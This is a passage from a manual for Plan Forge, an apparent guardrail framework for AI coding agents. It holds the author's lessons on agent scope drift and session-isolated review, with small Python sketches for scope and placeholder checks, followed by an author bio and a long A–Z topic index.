Through 2025 I kept watching the same pattern in client demos. An agent would build a CRUD app from a single prompt. Five minutes in, the room would gasp. Endpoints, a UI, real data flowing. Five days later, that same app couldn't survive a second feature being added. No interfaces. No DTOs. Errors swallowed by catch (Exception). Tests that only covered the happy path. No cancellation tokens. No consideration for financial precision in code that was literally adding up money.

What we kept calling "software" was a demo with a database glued underneath. That's the 80/20 wall before anyone had named it: AI gets you to 80% in 20% of the time, and then the remaining 20% (the architecture, the tests, the error handling, the security) takes the other 80% of the effort to bolt on, while the AI-generated foundation fights you every step of the way.

The login page that grew an admin panel

I asked an agent for a login page once. I got a login page, a password reset flow, a user profile screen, a half-built admin panel, and a database migration that touched four tables I never mentioned. The agent wasn't being creative. It was being thorough with zero scope constraints.

That's the day "Forbidden Actions" became a required section in every Plan Forge plan. Explicit prohibitions like "do NOT add features outside this spec, do NOT refactor untouched files, do NOT change the schema beyond what's specified" cut scope drift by an order of magnitude. The most powerful guardrail isn't "do this." It's "don't do that."
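The idea behind a scope prohibition can be sketched in a few lines. This is only an illustration, not how Plan Forge enforces Forbidden Actions: the function name `out_of_scope`, the glob patterns, and the file paths are all hypothetical, chosen to mirror the login-page story above.

```python
from fnmatch import fnmatch


def out_of_scope(changed_files, allowed_patterns):
    """Return the changed files that match none of the allowed glob patterns."""
    return [
        path
        for path in changed_files
        if not any(fnmatch(path, pattern) for pattern in allowed_patterns)
    ]


# Hypothetical scope for a "build me a login page" request.
allowed = ["src/pages/login/*", "tests/login/*"]

# Hypothetical list of files the agent actually touched.
changed = [
    "src/pages/login/LoginForm.tsx",
    "src/pages/admin/AdminPanel.tsx",
    "db/migrations/0042_add_tables.sql",
]

violations = out_of_scope(changed, allowed)
for path in violations:
    print(f"out of scope: {path}")
```

The point of the sketch is the direction of the check: anything not explicitly allowed counts as a violation, which is the "don't do that" framing rather than the "do this" one.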

The reviewer with no memory

The hardest lesson to internalize was that an agent in a long session will always believe its own code is correct. It has sunk-cost bias baked into the context window. It literally cannot see its own blind spots because those blind spots are sitting in the same token sequence that produced the code.

The first time I ran the same review prompt in a fresh session (same guardrails, no memory of the shortcuts the builder had considered and rejected), it caught fifteen issues the original session swore weren't there. Session isolation between builder and reviewer stopped being a nice idea and became a non-negotiable. It's why Plan Forge runs four sessions instead of one, why Session 3 is always a fresh reviewer, and why I trust that reviewer's output more than I trust my own first read.

The customer-reported broken link

Late in 2025 a customer reported a broken link on a page I'd shipped weeks earlier with an AI agent. I opened the file. Sure enough, an <a href="#"> placeholder the agent had left as scaffolding and nobody had grepped for. Then I went looking for siblings. There were twenty-three of them across the site. Plus a "Coming soon" on the pricing page. Plus a TODO in the FAQ. The build had been "green" the entire time because nothing in our pipeline was actually looking for those things in the deployed artifact.

That's where LiveGuard came from. The forge can't just stop caring at git push. Drift scoring, secret scanning, dep watch, regression guards: the build leaves the shop, but the watching shouldn't. The on-call runbooks grew out of the same incident.
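The missing check in that incident, something that inspects the built site for leftover scaffolding, is small enough to sketch. This is a minimal illustration under stated assumptions, not LiveGuard's implementation: the pattern list, the function names `scan_text` and `scan_site`, and the choice to scan only `.html` files are all hypothetical.

```python
import re
from pathlib import Path

# Hypothetical placeholder patterns, taken from the three kinds of leftovers
# described above: empty links, "Coming soon" copy, and TODO markers.
PLACEHOLDER_PATTERNS = {
    "empty link": re.compile(r'href\s*=\s*["\']#["\']', re.IGNORECASE),
    "coming soon": re.compile(r"coming soon", re.IGNORECASE),
    "todo marker": re.compile(r"\bTODO\b"),
}


def scan_text(text):
    """Return (line_number, label) for each placeholder found in text."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for label, pattern in PLACEHOLDER_PATTERNS.items():
            if pattern.search(line):
                hits.append((number, label))
    return hits


def scan_site(root):
    """Scan every .html file under root; return {path: hits} for files with hits."""
    report = {}
    for path in sorted(Path(root).rglob("*.html")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


sample = (
    '<a href="#">Docs</a>\n'
    "<p>Pricing: Coming soon</p>\n"
    '<a href="/faq">FAQ</a>\n'
    "<!-- TODO: answers -->"
)
print(scan_text(sample))
```

Running `scan_site` against the build output directory and failing the pipeline when the report is non-empty would have turned that "green" build red. Real anchors such as `href="#pricing"` are not flagged, because the pattern only matches a bare `#`.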

Background

My work at Microsoft focuses on Azure enterprise architecture, helping organizations design cloud systems that scale, stay secure, and remain maintainable over years. Before that, I built distributed systems, designed multi-tenant SaaS platforms, and ran engineering teams where architecture governance was a daily concern.

That background shapes Plan Forge in specific ways. Three threads from my day-job work show up directly in the framework:

Stamps pattern architecture: my open-source StampsPattern project brings Azure enterprise cell isolation to infrastructure-as-code. The same boundary-thinking shows up in every Plan Forge scope contract and in the enterprise reference architecture.
Multi-tenant isolation: years of building SaaS platforms taught me that "works for one tenant" is not the same as "works for all tenants." Plan Forge's multi-tenancy reviewer agent comes from real production incidents.
Guardrails as culture: every great team I've worked on had non-negotiable standards. The bad ones always thought they were "agile" enough to skip them. The guardrails aren't about distrust; they're about consistency. The instruction files exist so the same rules apply whether your team member is a junior dev, a senior engineer, or an AI model.

Where I Am With It Today

I use Plan Forge daily. It builds itself (the version of the manual you're reading was generated by the version of the pipeline before it), it builds my homelab tooling, and it's the way I onboard every new client project. When I find a rough edge, I file the bug into my own queue and the next phase fixes it. That feedback loop, me eating my own dog food, is the only reason the framework has survived past v1.

A Passion Project, Built in the Open

One thing I want to be straight about: Plan Forge is a passion project. It's something I build nights and weekends because the problem genuinely bugs me, not because anyone is paying for a feature roadmap, not because there's a release-quality QA team behind it, and not because every corner is polished. It isn't perfect. It probably never will be. There will be rough edges in the CLI, the dashboard will surprise you sometimes, and the docs will lag behind the code more often than I'd like.

What it does have is a tight feedback loop with the people actually using it. Every meaningful improvement in the last year came out of someone trying it on a real project, hitting a wall, and telling me what broke. That covers auto-loading instruction files, the Forbidden Actions section, quorum mode, LiveGuard, the four-station shop layout, and the Crucible interview. Plan Forge grows by your input. That's not a marketing line; it's literally how the roadmap gets built. See the project history and lessons learned chapters for the receipts.

So if you try it and it stumbles, please tell me. File an issue. Open a PR. Comment on a blog post. Build an extension for a niche your team cares about. The best version of Plan Forge is the one shaped by the people who actually have to ship software with it. If you're stuck before you even get there, the troubleshooting chapter and failure-mode catalog usually have a head start on the answer.

If you're looking for something specific to dig into, the highest-impact contributions right now are: language presets beyond .NET, Node, and Python (Rust, Go, and Java are mapped but under-tested), notification extensions for Slack / Teams / PagerDuty / email, new entries for the failure-mode catalog, and reviewer agents for domains I don't work in daily (ML pipelines, mobile, embedded). If you ship something in one of those areas, I will absolutely talk about it.

GitHub: srnichols/plan-forge. Issues, discussions, PRs all welcome.
Blog: planforge.software/blog. Long-form posts on what's working, what isn't, and why.
Contributing: View contributing guide on GitHub
Extensions: Build and publish your own domain guardrails. See Chapter 12.
Customizing the framework: The Customization chapter walks through tweaking presets, skills, and hooks.
License: MIT. Fork it, embed it, rewrite half of it. Whatever helps your team ship better software.

Plan Forge builds Plan Forge. Every feature in this framework was developed using the same pipeline it ships to users: 55+ phases, 7,500+ self-tests, v1.0 through v3.11 with zero manual rollbacks. If the pipeline can build itself without drift, it can build your project too. And when it can't, that's where you come in.

Appendix O

Book Index

A–Z topic index: every concept, tool, and named section across the manual, with a direct link to the page that covers it.

How this is built. This page is auto-generated by node docs/manual/maintain.mjs from the chapter list and curated section index in assets/manual.js. To add a new entry, add it to the relevant page and re-run the script. See also the Glossary for definitions of core terms.

Jump to letter

A B C D E F G H I L M N O P Q R S T U V W Y

A

A Day in the Forge — Three Vignettes

A Day in the Life of a Slice

About the Author

Actions Tab

Adoption Path - Two Routes (Stakeholder Briefing)

Advanced Execution

Agent Factory — The Recipe in One Page

Agent Factory Recipe

Agent Not Following Guardrails

Agents Don't Drift Maliciously

Air-Gapped Deployment

analyze vs diagnose

Ch 8 · CLI Reference

Anvil (L3 boundary, DLQ, capability handshake)

Anvil & Lattice Dashboard Tab

API Key Configuration

applyTo Pattern Reference

Audit Loop (Deep Dive)

Audit-Loop Activation

Auto-Loading Beats Manual

Azure Government

B

Bug Registry MCP Tools

C

Capacity Planning (Per-Team Sizing)

Check Prerequisites

Choosing Your Preset

CI Integration GitHub Actions

Claude Code Setup

CLI Reference

Ch 8 · CLI Reference

Clone and Run Setup

Cloud Agent

Codex Setup

Common Error Messages

Common Mistakes

Compliance — Audit Logging

Compliance — Data Flow

Compliance — Identity and Authentication

Compliance & Data Residency

Compliance Posture (SOC2 / HIPAA / PCI / FedRAMP / GDPR)

Config Tab

Configuration Hierarchy

Context Files per Slice

Conventions Used in This Manual

copilot-instructions.md

Core MCP Tools

Cost — Anti-lock-in posture (BYOK, no proxy, no telemetry, open pricing)

Cost — Cost drivers (model tier, tokens, quorum, cache, reasoning, retries)

Cost — Cost-effective workflows (slice sizing, routing, gates, cache, quorum)

Cost — Estimate vs actuals (forge_estimate_quorum vs forge_cost_report)

Cost — Forecasting at scale (groupBy model / role / scope)

Cost — Orientation (BYOK, no markup, per-slice attribution)

Cost — Per-quorum-mode economics (auto / power / speed / disabled)

Cost — Three sources of truth (pricing table, estimators, actuals)

Cost — Worked example (slice B5 ship REST API reference)

Cost & Economics

Cost Discipline

Cost Optimization

Cost Tab

Cost Tracking

Costs Are Too High

Creating Extensions

Cross-Stack Agents

Ch 5 · Crucible (Idea Smelting)

Crucible (Idea Smelting)

Crucible MCP Tools

Cursor Setup

Custom Instruction Files

Customization

D

Dashboard — Forge-Master

Dashboard — LiveGuard

Dashboard — Settings

Dashboard Won't Load

Day 1 — Pilot Installation

Diagnostic Tools

Ch 10 · Instruction Files & Agents

Discovery Harness Implementation

Audit Loop (Deep Dive)

Domain Instruction Files

E

Easy Button (one-prompt install)

Ch 20 · The Remote Bridge

End-to-End Workflow: WhatsApp to Shipped PR

Enterprise Architect Ladder (Reader Paths)

Enterprise Reference Architecture

Env Vars — Azure OpenAI Alternative Routing

Env Vars — CLI Internal (set transiently by pforge)

Env Vars — Feature Toggles

Env Vars — Host Detection (read-only)

Env Vars — Orchestrator Timing (gate, worker timeouts)

Env Vars — Project and Runtime

Env Vars — Provider API Keys (XAI, OpenAI, Anthropic)

Env Vars — Resolution Precedence

Env Vars — Server Ports and Network

Env Vars — Telemetry (OpenTelemetry)

Env Vars — Worked Example (PowerShell profile)

Env Vars Reference — Orientation

Environment Variables Reference

Errors & Exit Codes

Errors & Exit Codes — CI / scripting recipes

Errors & Exit Codes — Error events on the hub

Errors & Exit Codes — MCP tool errors (forge_* envelope)

Errors & Exit Codes — Named error catalog (A-Z)

Errors & Exit Codes — Orchestrator exit codes & statusReason

Errors & Exit Codes — Orientation (4 layers)

Errors & Exit Codes — OS subprocess exits (Ctrl+C, SIGKILL, SIGTERM)

Errors & Exit Codes — pforge CLI exit codes (0/1/2)

Errors & Exit Codes — REST error shape (HTTP 400/404/409/429/500)

Escalation Chains

Estimating Quorum Cost forge_estimate_quorum

Event Catalog

Event Catalog — Bridge (approval-*, bridge-notification-*)

Event Catalog — Client→server (set-label)

Event Catalog — Common Envelope (version, type, source, security_risk)

Event Catalog — Consuming the Stream (WebSocket subscription)

Event Catalog — Crucible (crucible-smelt-*)

Event Catalog — Escalation & CI (slice-escalated, ci-triggered)

Event Catalog — Lifecycle (run-started, slice-*, run-completed)

Event Catalog — LiveGuard (drift, incident, secret-scan, watch-*)

Event Catalog — Orientation

Event Catalog — Retention (hub ring, run journal, LiveGuard cache, OpenClaw)

Event Catalog — security_risk enum

Event Catalog — Skills (skill-started, skill-step-*)

Event Catalog — source enum

Event Catalog — Tempering (bug-validated-fixed)

Evidence A/B Test Results

Execute the Plan (Quickstart)

Executive Summary (Stakeholder Briefing)

Extension Author Ladder (Reader Paths)

Extension Catalog

Extensions

F

.forge.json — agents (claude, cursor, codex)

.forge.json — brain.federation (cross-project memory)

.forge.json — Execution Limits (parallelism, retries)

.forge.json — extensions

.forge.json — forgeMaster reasoning loop

.forge.json — Full Annotated Example

.forge.json — hooks.postSlice (drift thresholds)

.forge.json — hooks.preAgentHandoff

.forge.json — hooks.preDeploy (LiveGuard)

.forge.json — meta.selfRepairRepo

.forge.json — modelRouting (default, execute, review)

.forge.json — openclaw analytics bridge

.forge.json — Project Identity (projectName, preset)

.forge.json — quorum (multi-model consensus)

.forge.json — runtime.gateSynthesis (Phase-25 L6)

.forge.json — runtime.reviewer (Phase-25 L4)

.forge.json — testbed.path

.forge.json — updateSource (auto / github-tags)

.forge.json Config

.forge.json Reference

.forge.json Reference — Orientation

Failure Mode FM1 — Token limit hit

Failure Mode FM10 — Worker spawn failure

Failure Mode FM11 — Git stash conflict on rollback

Failure Mode FM12 — Snapshot apply failure

Failure Mode FM13 — Plan parse error

Failure Mode FM14 — Provider rate limit (HTTP 429)

Failure Mode FM15 — Provider 5xx / outage

Failure Mode FM16 — Auth expired

Failure Mode FM17 — L2 jsonl corruption

Failure Mode FM18 — L3 endpoint unreachable

Failure Mode FM19 — Hook false positive

Failure Mode FM2 — Model timeout

Failure Mode FM20 — Hook script error

Failure Mode FM21 — Quorum panel disagrees below threshold

Failure Mode FM22 — Quorum panelist timeout

Failure Mode FM23 — Port already in use

Failure Mode FM24 — Disk full

Failure Mode FM25 — File locked (Windows)

Failure Mode FM3 — Malformed tool call

Failure Mode FM4 — Edit blocked by scope / forbidden actions

Failure Mode FM5 — Worker loop detected

Failure Mode FM6 — Gate test failure (legitimate)

Failure Mode FM7 — Gate timeout

Failure Mode FM8 — Non-portable gate command

Failure Mode FM9 — Documentation validator drift

Failure Modes — General recovery techniques

Failure Modes — Index (25 failure modes across 8 layers)

Failure-Mode Catalog

Feature Parity Matrix

Fleet KPIs

Fleet Operator Playbook

Focused Instructions Beat Generic Ones

Foreword — From Impossible to Seven Minutes

forge_abort Stop Execution

forge_analyze Consistency Scoring

forge_capabilities Discovery

forge_diagnose Bug Investigation

forge_estimate_quorum Cost Preview

forge_generate_image

forge_plan_status Execution Status

forge_run_plan Execute Plan

forge_smith Environment Check

forge_sync_memories (Copilot Memory soft-sync)

Forge-Master

Forge-Master MCP Tool

Forge-Master Studio Tab

G

Gemini Setup

Generic Enterprise Reference Architecture

GitHub Stack Alignment

Glossary

Ch A · Glossary

Grok Image Generation

Ch D · Grok Image Warnings

Grok Image Warnings

H

Hallmark (provenance, hallmark/v1)

Harden the Plan (Quickstart)

Health DNA

Ch 25 · Health DNA

Host-Aware Routing

How Do I — Brief Stakeholders and Onboard Readers

How Do I — Customize Plan Forge for My Project

How Do I — Debug and Troubleshoot

How Do I — Execute a Plan

How Do I — Extend and Integrate

How Do I — Install and Set Up

How Do I — Operate at Scale (Teams and Fleets)

How Do I — Plan a Feature

How Do I — Review and Ship

How Do I — The Nine Intent Groups

How Do I…? — Task Index

How Guardrails Auto-Load (applyTo)

How It Works

How Plan Forge Composes with GitHub

How the New Memory Pieces Fit the Old Tiers

How the Shop Remembers

How To Read This Book (Foreword)

I

Independent Review (Quickstart)

Independent Review Catches What Builds Miss

Install

Installation

Installing Extensions

Ch 10 · Instruction Files & Agents

Instruction Files & Agents

Instructions & Agents — Reference

Integrating from Outside

Ch 29 · Integrating from Outside

L

Lattice (code-graph, chunker, callers, blast)

Lessons Learned

Lifecycle Hooks

Lifecycle Hooks — Copilot session (SessionStart, PreToolUse, PostToolUse, Stop)

Lifecycle Hooks — LiveGuard (PreDeploy, PostSlice, PreAgentHandoff)

Lifecycle Hooks — Plan-execution guard (PreCommit)

Lifecycle Hooks — Resolution order

Lifecycle Hooks — Writing a custom hook

Lifecycle Hooks Reference — all eight hooks

Ch F · LiveGuard Alert Runbooks

List of Figures

Ch P · List of Figures

LiveGuard Alert Runbooks

LiveGuard Env Tab

LiveGuard Health Tab

LiveGuard Incidents Tab

LiveGuard MCP Tools

LiveGuard Security Tab

Ch 17 · LiveGuard Tools Reference

LiveGuard Tools Reference

LiveGuard Triage Tab

M

Make This Yours - Tailoring Flow (Stakeholder Briefing)

Ch 11 · MCP Server & Tools

MCP Server — Quick Start

MCP Server — Reference

MCP Server & Tools

MCP Server Architecture

Ch 11 · MCP Server & Tools

MCP Server Chapter Overview

Ch 11 · MCP Server & Tools

MCP Server Selection (Plan Forge / GitHub / Foundry Toolbox)

MCP Tools 69 Categories

Ch 21 · Memory Architecture

Memory Architecture

Microsoft Foundry Composition Variant

Model Routing

Multi-Agent Quorum Turns PFORGE_QUORUM_TURN

Multi-Agent Setup

Multi-Agent Setup

Multi-Team Operations (Federated vs Centralized)

N

Nested Subagents

Network and Isolation Patterns (Cloud / Hybrid / Air-Gapped)

O

Observability Export (OTel)

One-Click Install

OpenBrain Memory

OpenBrain: The Connective Tissue

OTLP Telemetry Traces

P

Parallel Execution [P] tag

Parallel Execution DAG

pforge analyze

pforge check

pforge diagnose

pforge diff

pforge ext

pforge init

pforge run-plan

pforge smith

pforge smith Verification

pforge status

pforge sweep

pforge update

Pick Your Preset

Pipeline Agents

Pipeline Agents Click-Through

Plan Execution Fails

Plan Forge for Enterprise

Ch I · Plan Forge on the GitHub Stack

Plan Forge on the GitHub Stack

Plan Pattern Library

Plan Pattern P1 — Add an Entity (DB → service → API → UI)

Plan Pattern P10 — Performance Fix (benchmark-driven)

Plan Pattern P11 — Security Patch (CVE / vulnerability)

Plan Pattern P12 — Documentation Phase (one slice per document)

Plan Pattern P13 — CI/CD Workflow Change (no-op + promote)

Plan Pattern P14 — Spike-Then-Build (time-boxed exploration)

Plan Pattern P2 — Add an Endpoint (new route on existing entity)

Plan Pattern P3 — Add an External Integration (third-party API)

Plan Pattern P4 — Refactor a Subsystem (multi-consumer migration)

Plan Pattern P5 — Fix a Regression (strict red-green-refactor)

Plan Pattern P6 — Hotfix (minimal-surface emergency change)

Plan Pattern P7 — Feature Flag Rollout (ship dark, toggle later)

Plan Pattern P8 — Data Migration (additive + backfill + verify)

Plan Pattern P9 — Dependency Upgrade (per-module fix slices)

Plan Patterns — Anti-patterns (mega-slice, test-after, etc.)

Plan Patterns — Composing patterns across phases

Plan Patterns — Index of 14 patterns (when, slice count)

Plan Structure

Plans Are Markdown

Pre-flight Check (Quickstart)

Prerequisites

Progress Tab

Project History

Project Principles

Project Profile

Publishing Extensions

Q

Ch B · Quick Reference Card

Quick Reference Card

Quick Start for Evaluators

Quorum Complexity Scoring Rubric

Quorum Mode

Quorum Mode in Practice (Day in the Forge)

Quorum Quality Examples - 3 Models vs 1

Quorum vs Quorum Advisory

R

Reader-Journey Ladders — Pick Your Path

Reading the Hardened Plan

Replay Tab

REST API — Authentication, binding, and CORS

REST API — Bridge and approvals

REST API — Copilot integration

REST API — Cost

REST API — Crucible (idea smelting)

REST API — Discovery (well-known, capabilities, version, status)

REST API — Error response shape

REST API — Forge-Master (conversational entrypoint)

REST API — Generic MCP dispatcher (POST /api/tool/:name)

REST API — GitHub and team coordination

REST API — Image generation

REST API — Inner loop (reviewer calibration, gate suggestions)

REST API — LiveGuard (drift, incidents, deploys, secret scan)

REST API — Memory (L1/L2/L3)

REST API — Notifications, audit, dashboard, settings

REST API — Orientation (16 subsystems, 113 endpoints)

REST API — Plan execution and runs

REST API — Quorum and fix proposals

REST API — Search, timeline, hub

REST API — Skills (decision tray)

REST API — Tempering and bugs

REST API — Worked Examples (curl, wscat, SDK)

REST API Endpoints

REST API Reference

Resume and Retry

Review & Ship

Reviewer or Architect Ladder (Reader Paths)

Runs Tab

S

Sample Project

Ch E · Sample Project

Scaling the Factory Across Teams

SDK for Integrators

Security — AI-specific threats (prompt injection, untrusted tool output, scope escape)

Security — Attack surface enumeration

Security — Hardening checklist (12 controls)

Security — Incident response (LiveGuard front door)

Security — Orientation (developer-machine-first posture)

Security — Prompt injection defenses

Security — Sandboxing & gate execution (TCB boundary)

Security — Scope escape (drift detection, Review Gate)

Security — Secret management (env, .forge/secrets.json, gh auth)

Security — STRIDE per subsystem

Security — Supply chain (Plan Forge itself, extensions, providers)

Security — Trust boundaries (6 boundaries)

Security — Untrusted tool output defenses

Security & Threat Model

Self-Deterministic Loop (Deep Dive)

Sessions and Why They Matter

Settings API Keys Tab

Settings Brain Tab

Settings Bridge Tab

Settings Crucible Tab

Settings Execution Tab

Settings General Tab

Settings Memory Tab

Settings Models Tab

Settings Updates Tab

Setup Failed

Setup Wizard

Ship (Quickstart)

Skills — Authoring a New Skill

Skills — Events Emitted by the Runner

Skills — Shared Skills (every preset)

Skills — SKILL.md Runtime Contract

Skills — Stack-Specific Skills (per language)

Skills — Three Ways to Invoke

Skills Slash Commands

Skills Tab

Slice Boundaries Matter More Than You Think

Slices Gates and Scope

Slicing Strategy

Solo Developer Ladder (Reader Paths)

Spec Kit Ecosystem Extensions

Spec Kit Interop

Spec Kit Import Flow

Spec Kit Interop

Spec Kit Import Procedure

Spec Kit Interop

Specify the Feature (Quickstart)

Stack-Specific Agents

Ch C · Stack-Specific Notes

Stack-Specific Notes

Stakeholder Briefing — the 10-minute white paper

Starting the Dashboard

Starting the MCP Server

Step 0 Specify the Feature

Step 2 Harden the Plan

Step 3 — Route Agents to Lanes

Step 3 Execute

Step 5 Review

Stop Conditions

Studio Classification Badge

Studio Quorum Advisory

Studio Session Persistence

Sweep for Deferred Work (Quickstart)

T

Ch 27 · Team Coordination

Team Coordination

Team Lead Ladder (Reader Paths)

Tempering MCP Tools

Testbed MCP Tools

The .NET A/B Test — 99 vs 44 (Day in the Forge)

The 7-Step Pipeline

The 80/20 Wall

The Blacksmith Analogy

The Bug Registry

Ch 23 · The Bug Registry

The Competitive Loop (Deep Dive)

The Compounding Flywheel (Stakeholder Briefing)

Ch 26 · The Copilot Integration Trilogy

The Copilot Integration Trilogy

The Dashboard

The File System

The Five Ladders at a Glance (Reader Paths)

The Four Cost Levers (Stakeholder Briefing)

The Four New Pieces (Hallmark, Anvil, Lattice, sync_memories)

The Four-Station Shop (Foreword)

Ch 28 · The Knowledge Graph

The Inner Loop (Deep Dive)

The Knowledge Graph

The LiveGuard Dashboard

Ch 18 · The LiveGuard Dashboard

The Loop That Never Ends (Day in the Forge)

The One-Paragraph Version (Foreword)

The Problem in One Sentence

Ch 20 · The Remote Bridge

The Remote Bridge

The Testbed

Ch 24 · The Testbed

The Watcher

Ch 19 · The Watcher

Three Memory Commands You Can Run Today

Three Vignettes at a Glance (Day in the Forge)

Three-Lane Triage Funnel

Audit Loop (Deep Dive)

Timeline Tab

Traces Tab OTLP

Troubleshooting

Troubleshooting — Errors & Exit Codes quick reference

Two-Layer Guardrail Model

Typical MCP Workflow

U

Ch Q · Unified API Surface Index

Unified API Surface Index

Unified Memory Across Agents

Ch 21 · Memory Architecture

Universal Instruction Files

Ch 10 · Instruction Files & Agents

Update Source Modes

Ch G · Update Source Modes

Updating Plan Forge

V

v1.0 Foundation

v2.0 Autonomous

v2.10 OpenClaw

v2.14 GitHub Copilot Integration

v2.18 Temper Guards

v2.5 Quorum Mode

v2.83 Host-Aware Routing

v2.95 Lattice / Code-Graph

v3.0 Copilot Trilogy

v3.2–3.4 Team Mode

v3.6 OpenBrain L3 (current)

Validation Gates

Verify MCP Server Running

Verify with pforge smith

W

Watcher MCP Tools

Watcher Tab

WebSocket Hub Events

Week 12 — Full Fleet Quarterly Review

Week 4 — Pilot Graduation

What Changed (and What Did Not)

What GitHub Leaves to the Ecosystem

What GitHub Ships (the Substrate)

What Happens Without Guardrails

Ch 16 · What Is LiveGuard?

What Is LiveGuard?

What Is Plan Forge?

What Plan Forge Does

What Plan Forge Is and Is Not (Stakeholder Briefing)

What the Three Vignettes Share (Day in the Forge)

What This Book Is Not (Foreword)

What This Is Not

What We Add You Didn't Ask For (Stakeholder Briefing)

What's Next After Quickstart

When Two Ladders Apply (Reader Paths)

Where to Find What You Need (Enterprise)

Who This Is For

Why Cheaper Models Punch Above Their Weight

Why Open Source Matters (Stakeholder Briefing)

Why Plan Forge for the Enterprise

Why Session Isolation Works

Windsurf Setup

Worked Example - Copilot CLI + Grok API

Writing a Good Scope Contract

Writing Plans That Work

Y

Your First Plan

Your First Plan